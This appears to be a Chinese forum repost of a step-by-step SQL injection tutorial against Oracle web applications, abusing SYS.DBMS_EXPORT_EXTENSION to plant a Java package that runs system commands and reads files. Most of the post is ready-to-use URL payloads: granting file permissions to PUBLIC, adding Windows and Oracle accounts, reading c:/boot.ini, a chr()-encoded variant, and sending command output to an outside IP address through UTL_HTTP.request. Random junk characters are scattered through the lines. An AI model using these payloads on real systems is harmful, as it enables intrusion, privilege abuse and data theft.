以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
$ g- B. X, Y* ?' J4 Q
$ `" J+ a7 @! o' E" c9 G* W1 L /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
! E) ?9 q4 ?! t! d- U的形式即可。(用" 'a'|| "是为了让语句返回true值)
- X) K; T0 n4 }* [, Z语句有点长,可能要用post提交。
! V; g5 r5 d$ }5 k以下是各个步骤: & u8 o" \& Z7 C8 _0 f! a
1.创建包 # r/ A/ ?$ O/ a4 a( e
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:0 N" c3 G$ u4 U+ z, a. d
/xxx.jsp?id=1 and '1'<>'a'||( $ }3 {( ?; Y! |3 `4 U$ i
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 c& z- ?5 @. _1 B s: ?create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
+ w, X% z+ Y6 q' \new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
( x4 i, g3 _0 [! G6 \' w}'''';END;'';END;--','SYS',0,'1',0) from dual
7 m# Z" N8 N& m! J- b4 `) ; N8 f; O6 T( e; B
------------------------ ) f$ z. v, x x( ~+ J9 V5 G
如果url有长度限制,可以把readFile()函数块去掉,即:
$ [5 }! E I# r" G/ `/xxx.jsp?id=1 and '1'<>'a'||( 0 }2 ]" M6 G+ F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''': S( c h: z2 s' Q
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
4 s1 \% ^5 E: J1 Q' t/ {* Cnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
% T0 ?. Y7 |7 g$ |}'''';END;'';END;--','SYS',0,'1',0) from dual
9 c7 B6 ~8 B2 Y9 {9 {)
9 k, `" `9 n J4 ]# q2 }7 U2 }0 x; K同时把后面步骤 提到的 对readFile()的处理语句去掉。
7 n/ `3 Y6 d" m------------------------------
' s5 {; s, R; Z! e; }, k) J2.赋Java权限 ) h3 Q' @ r" l2 E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual/ \9 I7 N4 x. H q/ Z& A: {0 w
3.创建函数
# Z$ m) q$ F4 `, u1 cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 w/ k3 D0 i6 |5 m6 a' Gcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual6 N3 N& V1 u- I$ A: N) v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 ?# |9 l+ R$ ^8 U" Pcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual* g9 x5 |( y3 o3 u
4.赋public执行函数的权限 ) }/ _% b! ~3 p+ Y; O l9 x8 t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual- w" X. ~ L5 T- ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual- V+ b1 B, V# f4 P7 |
5.测试上面的几步是否成功
+ @- j. B! U* W5 J# w* `and '1'<>'11'||(
; R4 s r* @ D+ ^8 I# Rselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' # ~1 s' Y5 u/ f3 e3 o/ r4 L' `
) r9 E+ A4 ^( o- d$ j3 b1 x
and '1'<>( 6 L, [( @$ b( a
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
' B* [$ F8 i6 V2 f)
: ^' s- t9 l5 [5 S" b1 c* X, F" K; w6.执行命令:
; |0 B' {0 ?& J! Y* y$ \/xxx.jsp?id=1 and '1'<>( # m2 f* ]% W( a+ F3 k
select sys.LinxRunCMD('cmd /c net user linx /add') from dual / E! h$ w" v6 |; V# F* h3 Q
9 Y# k& w1 {4 n/ p4 q! t) ) `& c0 S1 H8 I9 ]% r; X
/xxx.jsp?id=1 and '1'<>( ) e, l' u4 r3 k
select sys.LinxReadFile('c:/boot.ini') from dual% j- v! ^( U: B
& o2 n' l {( l)
8 C8 O/ ?# O1 ^7 n W8 H2 \: e
& q. F) Q8 M9 A! f- h }注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
% ^4 f3 `! D( I0 Q$ I, [# {' }1 p如果要查看运行结果可以用 union :
. e1 @+ y9 s5 f7 V* `! g; g7 [/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual# J2 J6 q" d7 ~9 Q0 u1 o
或者UTL_HTTP.request(: + H) Q* j) s# G) o m9 v! N
/xxx.jsp?id=1 and '1'<>( # n% ]* u: ~/ Z I. g3 V
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
3 p8 Q7 P$ Z; r7 \: n+ g)
; \2 B* Q8 o- u- V/xxx.jsp?id=1 and '1'<>( v+ a# _1 O% E4 s9 ~
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual' N9 s& C# k0 y3 H8 N
) / F1 i+ m% R/ a
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。; E9 v" ]. w4 p
--------------------
% M8 l; a* q7 d [6.内部变化 6 \. K! m% I+ s! {5 W( W, t
通过以下命令可以查看all_objects表达改变:
$ h! a' I4 y" F! A$ Oselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
) K" F6 J# H9 ~: W* ~( O7.删除我们创建的函数 O; Z) _7 m/ A) ?% X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, u: c& V; | }2 z) ~7 I3 ldrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual / k; U M* D5 V4 F
==================================================== ( R5 q h$ s: x6 H. \' O( S( e
全文结束。谨以此文赠与我的朋友。
8 u: y* I, C' Zlinx
+ k! U* C- g* o* S- V! u8 ~, M124829445
8 Z. R S* n F2008.1.12 , F, f0 U2 F. L! y
linyujian@bjfu.edu.cn ' ?) M$ O: f& J
====================================================================== 1 A! s7 E+ ]; f) Y N; E( z
测试漏洞的另一方法: 9 ~, _* |( z) _0 ~4 }, ~
创建oracle帐号: 7 D' H5 |% ]) ?, K6 \' z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( i( H% ~# ^7 [! j% o0 L4 {8 r) P
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual$ U6 `; i6 }# a2 z7 G$ i0 X: o
即: / I: f3 [) Q2 E/ X+ ^; B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),5 q/ Y: E9 S: s8 J
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual ) ?! {. I( V! M0 M
确定漏洞存在: ( N( n$ W# w) t6 J' r, b% V4 u
1<>( * _5 Y0 F) O3 o# E, n& {! w% s
select user_id from all_users where username='LINXSQL' 9 t v8 t4 s) m/ j$ L
)
0 ~" z; | O$ [* B; N" p4 Y2 e给linxsql连接权限: . ~ t1 x4 h7 L% X) ~ g5 T1 F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 @% G a' d: E8 ^, F
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual ; s1 Q k* o p7 H
删除帐号: ( S" J' O# a. a% O; X n: W2 }) L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' B; u0 O% \' T* a" R5 m1 J, X1 Z
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 2 F+ X$ c. ^8 s
======================
8 E' W/ C8 r, M6 B. e# b7 L以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:5 @' S! S c5 E7 p; F; S' S
1.jsp?id=1 and '1'<>(
" g, ~. ?: i9 ~' K' I5 }0 ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* R& w1 o* R+ n/ V7 d3 d ^
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual) k, Q. {4 o, ?6 B6 N6 p1 e
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
6 m* e2 d2 o$ @1 g )
% t: V# J0 z& L2 q; P6 s8 [" }6 P* s9 i8 x- Q; y, n1 @
; v- p& ?7 V. L& t4 v; w0 P
( q) r0 L/ D, k2 b8 s9 o& y' u |
发表于 2012-12-18 12:21:48
收藏
支持
反对